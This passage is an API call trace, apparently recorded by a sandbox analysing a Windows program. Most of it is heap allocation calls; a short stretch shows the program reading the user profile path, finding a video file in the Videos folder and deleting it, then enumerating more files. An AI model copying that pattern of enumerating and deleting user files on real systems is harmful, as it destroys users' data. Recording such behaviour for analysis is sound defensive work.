out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0259.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0259.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0259.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0259.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0259.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0259.082] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0259.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0259.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.082] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0259.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0259.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0259.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0259.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0259.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0259.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0259.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0259.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0259.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0259.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0259.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0259.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0259.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0259.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5a) returned 0x9787d0 [0259.083] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/XujfB_EFQdQYTzBm8.flv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\XujfB_EFQdQYTzBm8.flv", lpFilePart=0x8cedf4*="XujfB_EFQdQYTzBm8.flv") returned 0x2c [0259.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9787d0 | out: hHeap=0x970000) returned 1 [0259.083] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\XujfB_EFQdQYTzBm8.flv" (normalized: "c:\\users\\fd1hvy\\videos\\xujfb_efqdqytzbm8.flv")) returned 0x20 [0259.083] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\XujfB_EFQdQYTzBm8.flv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e4974c0, ftCreationTime.dwHighDateTime=0x1d5e88c, ftLastAccessTime.dwLowDateTime=0x8b491040, ftLastAccessTime.dwHighDateTime=0x1d5ea8c, ftLastWriteTime.dwLowDateTime=0x8b491040, ftLastWriteTime.dwHighDateTime=0x1d5ea8c, nFileSizeHigh=0x0, nFileSizeLow=0x2bd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="XujfB_EFQdQYTzBm8.flv", cAlternateFileName="XUJFB_~1.FLV")) returned 0xa87050 [0259.083] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\XujfB_EFQdQYTzBm8.flv" (normalized: "c:\\users\\fd1hvy\\videos\\xujfb_efqdqytzbm8.flv")) returned 1 [0259.084] FindNextFileW (in: hFindFile=0xa87050, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e4974c0, ftCreationTime.dwHighDateTime=0x1d5e88c, ftLastAccessTime.dwLowDateTime=0x8b491040, ftLastAccessTime.dwHighDateTime=0x1d5ea8c, ftLastWriteTime.dwLowDateTime=0x8b491040, ftLastWriteTime.dwHighDateTime=0x1d5ea8c, nFileSizeHigh=0x0, nFileSizeLow=0x2bd9, dwReserved0=0x0, dwReserved1=0x0, cFileName="XujfB_EFQdQYTzBm8.flv", cAlternateFileName="XUJFB_~1.FLV")) returned 0 [0259.084] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0259.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0259.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0259.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0259.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0259.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0259.085] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0259.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0259.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0259.085] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0259.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0259.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0259.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0259.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0259.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0259.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0259.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0259.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0259.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0259.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0259.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0259.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0259.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0259.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0259.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0259.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0259.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0259.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0259.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5a) returned 0x9787d0 [0259.086] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/XujfB_EFQdQYTzBm8.flv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\XujfB_EFQdQYTzBm8.flv", lpFilePart=0x8cf650*="XujfB_EFQdQYTzBm8.flv") returned 0x2c [0259.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9787d0 | out: hHeap=0x970000) returned 1 [0259.086] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\XujfB_EFQdQYTzBm8.flv" (normalized: "c:\\users\\fd1hvy\\videos\\xujfb_efqdqytzbm8.flv")) returned 0xffffffff [0259.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0259.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0259.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0259.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0259.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0259.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0259.086] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0259.086] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0259.086] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0259.086] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0259.087] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0259.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0259.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0259.087] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3e0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0259.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0259.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0259.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0259.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0259.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0259.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0259.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0259.088] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0259.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0259.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0259.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0259.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0259.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0259.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0259.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0259.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 